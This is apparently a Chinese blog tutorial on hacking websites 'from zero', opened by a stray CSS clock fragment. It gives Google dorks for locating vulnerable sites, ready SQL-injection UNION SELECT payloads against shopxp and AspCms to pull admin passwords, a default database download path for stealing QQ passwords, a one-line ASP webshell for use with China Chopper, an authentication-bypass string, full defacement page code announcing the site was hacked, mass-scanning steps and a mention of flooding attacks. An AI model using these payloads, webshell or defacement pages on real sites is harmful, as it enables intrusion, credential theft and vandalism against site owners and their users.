纯css打造立体时钟
  • 12
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
By_jie

xh_零基础网站渗透第一部

一、认识常见网站类型

  1.1asp:asp是动态服务器页面(active server page)的英文缩写。是微软公司开发的代替cgi脚本程序的一种应用,它可以与数据库和其它程序进行交互,是一种简单、方便的编程工具。asp的网页文件的格式是.asp和.aspx。现在常用语各种动态网站中。

  1.2php:php原始为Personal Home Page的缩写,已经正式更名为 "PHP: Hypertext Preprocessor"。注意不是“Hypertext Preprocessor”的缩写,中文名:“超文本预处理器”,是一种通用开源脚本语言。语法吸收了C语言、Java和Perl的特点,利于学习,使用广泛,主要适用于Web开发领域。PHP 独特的语法混合了C、Java、Perl以及PHP自创的语法。它可以比CGI或者Perl更快速地执行动态网页。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HTML(标准通用标记语言下的一个应用)文档中去执行,执行效率比完全生成HTML标记的CGI要高许多;PHP还可以执行编译后代码,编译可以达到加密和优化代码运行,使代码运行更快。

  1.3html:超文本标记语言(Hyper Text Markup Language),标准通用标记语言下的一个应用。HTML 不是一种编程语言,而是一种标记语言 (markup language),是网页制作所必备的
“超文本”就是指页面内可以包含图片、链接,甚至音乐、程序等非文字元素。
超文本标记语言的结构包括“头”部分(英语:Head)、和“主体”部分(英语:Body),其中“头”部提供关于网页的信息,“主体”部分提供网页的具体内容。

二、认识、辨别及搜索存在sql注入漏洞的网站
  2.1认识sql注入漏洞    

    所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 [1] 比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。

  2.2辨别sql注入漏洞的网站
    在带参网站后面,比如:http://www.xxx.com/xxx/xxx.jsp?id=xxx的后面输入 and 1=1(http://www.xxx.com/xxx/xxx.jsp?id=xxx and 1=1)返回正常、且 and 1=2(http://www.xxx.com/xxx/xxx.jsp?id=xxx and 1=2)返回错误,那么这一类型的网站存在sql注入漏洞。
  2.3搜索存在sql注入漏洞的网站(后面会借助工具)
    inurl:.jsp?id=xxx:搜索所有url中包含.jsp?id=xxx的网站。然后通过2.2验证该网站是否存在sql注入漏洞

三、制作一个属于你自己的黑页

<div class="ag" style="color:#F00;"><marquee behavior="scroll" scrollamount="2" onmouseout="this.start();" onmouseover="this.stop()">
<b>您好!xxx低调路过你的网站!请尽快修复漏洞!</b></marquee></div>

<table width="759" align="center" bgcolor="#000000">
  <tbody>
    <tr>
      <td height="18" width="765" align="middle"><p class="STYLE33">
        <script>

farbbibliothek = new Array(); 

farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100"); 

farbbibliothek[1] = new Array("#00FF00","#000000","#00FF00","#00FF00"); 

farbbibliothek[2] = new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00"); 

farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040"); 

farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000"); 

farbbibliothek[5] = new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF"); 

farbbibliothek[6] = new Array("#0000FF","#FFFF00"); 

farben = farbbibliothek[4];

function farbschrift() 

{ 

for(var i=0 ; i<Buchstabe.length; i++) 

{ 

document.all["a"+i].style.color=farben[i]; 

} 

farbverlauf(); 

} 

function string2array(text) 

{ 

Buchstabe = new Array(); 

while(farben.length<text.length) 

{ 

farben = farben.concat(farben); 

} 

k=0; 

while(k<=text.length) 

{ 

Buchstabe[k] = text.charAt(k); 


k++; 

} 

} 

function divserzeugen() 

{ 

for(var i=0 ; i<Buchstabe.length; i++) 

{ 

document.write("<span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span>"); 

} 

farbschrift(); 

} 

var a=1; 

function farbverlauf() 

{ 

for(var i=0 ; i<farben.length; i++) 

{ 

farben[i-1]=farben[i]; 

} 

farben[farben.length-1]=farben[-1]; 



setTimeout("farbschrift()",30); 

} 



var farbsatz=1; 

function farbtauscher() 

{ 

farben = farbbibliothek[farbsatz]; 

while(farben.length<text.length) 

{ 

farben = farben.concat(farben); 

} 

farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001)); 

} 

setInterval("farbtauscher()",5000); 

text= "xxx低调路过~"; //h 

string2array(text); 

divserzeugen(); 

//document.write(text); 

</script>
      </p></td>
    </tr>
  </tbody>
</table>
<p>&nbsp;</p>
</body>
</html>


<!-- saved from url=(0017)http://cybsg.com/ -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Generated by F12 developer tools. This might not be an accurate representation of the original source file -->
<HTML xmlns="http://www.w3.org/1999/xhtml"><HEAD><META content="IE=7.0000" http-equiv="X-UA-Compatible">
<SCRIPT language=javascript> function click() { if (event.button==2) { alert('xxx在此路过! ') } } document.onmousedown=click </SCRIPT>

<META content="text/html; charset=gb2312" http-equiv=Content-Type>
<STYLE type=text/css>
BODY {
    BACKGROUND-COLOR: #000000;
    MARGIN-TOP: 0px;
    MARGIN-LEFT: 0px;
    background-image: url();
    background-repeat: repeat;
}
#Layer1 {
    BACKGROUND-IMAGE: url(http://imgdata.hoop8.com/1401/518-1220317729.jpg); Z-INDEX: 1; POSITION: absolute; BACKGROUND-COLOR: #000000; WIDTH: 100%; HEIGHT: 100%
}
#Layer2 {
    Z-INDEX: 1; POSITION: absolute; WIDTH: 1109px; HEIGHT: 115px; TOP: 119px; LEFT: 173px
}
.STYLE4 {
    COLOR: #ff0000; FONT-SIZE: 12px
}
.STYLE6 {
    COLOR: #ffffff
}<script language="JavaScript" src="http://www.3v.cm/count.asp?id=lizhaowei"></script>
#Layer3 {
    Z-INDEX: 1; POSITION: absolute; WIDTH: 100%; HEIGHT: 100%
}
.STYLE11 {font-size: 50px}
.STYLE13 {color: #00CCFF}
.STYLE14 {color: #00FF99}
a:link {
    color: #FF0000;
}
a:visited {
    color: #FF0000;
}
.STYLE16 {
    font-size: 36px;
    font-weight: bold;
}
</STYLE>
</HEAD>
<BODY>
<P class=STYLE4 align=center> <font color="#f0dad2"><font color="#f0dad2"><font color="#f0dad2"><font color="#f0dad2"> </font></font></font></font>
  <embed height="0" type="application/x-shockwave-flash" align="center" width="0" src="http://divine-music.info/musicfiles/03%20Y'all%20Want%20a%20Single.swf" loop="True" autostart="True"></embed>
</P>
<P class=STYLE4 align=center><big><a href="<a target="_blank" href="" alt="http://wpa.qq.com/msgrd?v=3&uin=1330231906&site=qq&menu=yes"/></a><span class="STYLE11"></span></big></P>
<hr />
<P class=STYLE4 align=center><span class="STYLE16">xxx低调路过贵站,请尽快修复漏洞</span><br />
</P>
<P class=STYLE4 align=center><img src="http://y.photo.qq.com/img?s=CDyfm6URO&l=y.jpg" width="500" height="360" /></P>
<P class=STYLE4 align=center>xxx到此一游 | 本次检测属友情检测</P>
<hr />
<P class=STYLE4 align=center><a href=" " target="_blank">天赋异能 誰与争锋</a> | <a href=" " target="_blank">黑客的精神不在乎技术的高超!</a> |<a href=" " target="_blank"> 而是只在乎他对这种精神的追求</a> | <a href=" " target="_blank">不要拿黑与白的对立,来衡量你与我之间的距离!</a> | <a href=" " target="_blank">我只是友情监测!</a> | <a href=" " target="_blank">请见快修复你的漏洞</a></P>
<script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"16"},"slide":{"type":"slide","bdImg":"1","bdPos":"right","bdTop":"100"}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>

<SCRIPT LANGUAGE="JavaScript"> 
<!-- 
var Message="我是xxx,现在低调路过你的网站,请尽快修复漏洞"; 
var place=1; 
function scrollIn() { 
window.status=Message.substring(0, place); 
if (place >= Message.length) { 
place=1; 
window.setTimeout("Helpor_net()",300); 
} else { 
place++; 
window.setTimeout("scrollIn()",50); 
} 
} 
function Helpor_net() { 
window.status=Message.substring(place, Message.length); 
if (place >= Message.length) { 
place=1; 
window.setTimeout("scrollIn()", 100); 
} else { 
place++; 
window.setTimeout("Helpor_net()", 50); 
} 
} 
Helpor_net(); 
--> 
</SCRIPT>
<p class=MsoNormal><span lang=EN-US>
<script language="JavaScript"> 
<!--  
if (document.all){ 
Cols=23; 
Cl=22; 
Cs=40; 
Ts=10; 
Tc='#008800'; 
Tc1='#00ff00'; 
MnS=20; 
MxS=40; 
I=Cs; 
Sp=new Array();S=new Array();Y=new Array(); 
C=new Array();M=new Array();B=new Array(); 
RC=new Array();E=new Array();Tcc=new Array(0,1); 
document.write("<div id='Container' style='position:absolute;top:0;left:-"+Cs+"'>"); 
document.write("<div style='position:relative'>"); 
for(i=0; i < Cols; i++){ 
S[i]=I+=Cs; 
document.write("<div id='A' style='position:absolute;top:0;font-family:Arial;font-size:" 
+Ts+"px;left:"+S[i]+";width:"+Ts+"px;height:0px;color:"+Tc+";visibility:hidden'></div>"); 
} 
document.write("</div></div>"); 

for(j=0; j < Cols; j++){ 
RC[j]=1+Math.round(Math.random()*Cl);   
Y[j]=0; 
Sp[j]=Math.round(MnS+Math.random()*MxS);  
for(i=0; i < RC[j]; i++){ 
 B[i]=''; 
 C[i]=Math.round(Math.random()*1)+' '; 
 M[j]=B[0]+=C[i]; 
 } 
} 
function Cycle(){ 
Container.style.top=window.document.body.scrollTop; 
for (i=0; i < Cols; i++){ 
var r = Math.floor(Math.random()*Tcc.length); 
E[i] = '<font color='+Tc1+'>'+Tcc[r]+'</font>'; 
Y[i]+=Sp[i]; 

if (Y[i] > window.document.body.clientHeight){ 
 for(i2=0; i2 < Cols; i2++){ 
 RC[i2]=1+Math.round(Math.random()*Cl);   
 for(i3=0; i3 < RC[i2]; i3++){ 
 B[i3]=''; 
 C[i3]=Math.round(Math.random()*1)+' '; 
 C[Math.floor(Math.random()*i2)]=' '+' '; 
 M[i]=B[0]+=C[i3]; 
 Y[i]=-Ts*M[i].length/1.5; 
 A[i].style.visibility='visible'; 
 } 
 Sp[i]=Math.round(MnS+Math.random()*MxS); 
 } 
} 
A[i].style.top=Y[i]; 
A[i].innerHTML=M[i]+' '+E[i]+' '; 
} 
setTimeout('Cycle()',20) 
} 
Cycle(); 
} 
-->
</script></span></p>
</div>
</body>
</html>

</pre>
</font>
</center>
<center>
<font face=calibri color="#FF0000" size=3>
</style>
<div align="center"><br><img src="#" width="550" height="27"
<div align="center"> 
<br>
<MARQUEE class=lm_tipBox 
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; WIDTH: 500px; COLOR: #FF0000; PADDING-TOP: 0px; BORDER-BOTTOM: 1px solid; FONT-FAMILY: Monotype Corsiva; HEIGHT: 16px" 
width=581 
height=4>“ 我们是xxx,当您看到这里的时候,证明您的网站已被黑.”
</MARQUEE></B><FONT color=white <FONT>
<font face=calibri color="#FF00000" size=4><b>
</marquee>
</center>

</BODY>
</HTML>

 四、如何利用SQL注入漏洞入侵网站

  在确保一个网站存在sql漏洞之后,我们如何去利用这个漏洞进行进一步的渗透呢?比如我们用二验证了一个网站url:http://www.xxx.com/xxx/xxx.jsp?id=x确实存在sql注入漏洞、那么我们可以把这个url复制到Pangolin 1.2 (穿山甲)的URL中进行check、check出表名、对应表名里面的字段等等、当然这个的前期是你必须拥有强大的字典作为check的后盾、也可根据这个有sql注入站点的网站来配置你所要扫描的表名、列名等信息(常用)。这样一步步的就可以扫描出这个存在sql注入漏洞站点的用户名及密码(一般是md5加密的)、拿到用户名和密码之后、就可以用该url:http://www.xxx.com/xxx/xxx.jsp?id=x所对应的协议+域名:http://www.xxx.com/通过御剑后台扫描工具扫描出该站点所对应的后台管理员登录页面、然后登录之。登录之后我们就是这个网站最大的管理员了,我们想干什么就干什么、我们想让这个网站显示什么就显示什么,想让这个网站提供什么就提供什么,想上传什么木马(大马、小马)就上传什么木马、因为你拥有了该站点最大的管理权限。但是我友情提示一下:最好别任性妄为想干什么就干什么,因为你的任性可能会给你带来牢狱之灾(现实中这样的前车之鉴还少吗?)。

五、网站渗透+上传

  四的实战。

六、第五课通过漏洞获取后台账号密码  

  6.1搜索关键字:inurl:shopxp_news.asp

  6.2协议://域名/+TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin  

inurl:shopxp_news.asp
TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

    返回md5加密的管理员密码、somd5解之、然后用御剑扫描后台登录界面、登录之。

八、渗透qq教程网,拿数据库破解qq密码  

  关键字:教程网圆你网络之梦
  默认数据库下载地址: 域名+/_data/_dk_$%25%5e&.mdb

  下载下来之后用明小子打开即可!

九、发包攻击网站

  发包攻击主要用于攻击比较小一点的站点(服务器处理不过来客户端的请求从而出现down机)。

  截图说明:

  

 十一、aspcms漏洞利用  

  前期是网站必须是aspcms

域名+admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1

  登录之后:

  

  

    一句话木马:<%eval request("连接密码")%>

  点开刚才添加的这个文件、然后复制连接地址(url)用中国菜刀连接之。然后可以在web默认目下下上传你自己的黑页了!

  黑页面上传陈功之后就可以通过:协议+域名/+黑页全名就可以访问了!

 十二、批量扫描AspCms网站及验证漏洞

  12.1关键字

  保存如下关键字到xxx.txt

Powered by AspCms2
Powered by AspCms2.0
AspCms2
AspCms2.0
Powered

  12.2用url采集软件采集带有此关键字的网站

  

  采集些之后我们可以将这些含有关键字的网站统统的导出到xxx.txt中、然后利用批量漏洞扫描工具(MScan)扫描AspCms漏洞即可

  

  12.3如何利用AspCms漏洞

   请根据十一。

十三、phpweb漏洞站查找

  13.1关键字

inurl:/class/?1.html
inurl:class/index.php?catid=0
inurl:/page/html/?1.html

  默认后台:域名+/admin.php

  注入地址:  

down/class/index.php?myord=1
news/class/index.php?showtag=

  13.2关键字(推荐)  

inurl:news/html/?411.html

  默认后台:域名+/admin.php、所以通过配置御剑的形式来批量扫描、配置过程如下图所示:

    

  万能密码 admin 'or '1'='1

十四、 

 

posted @ 2019-05-28 16:17  1024军团  阅读(1152)  评论(0编辑  收藏  举报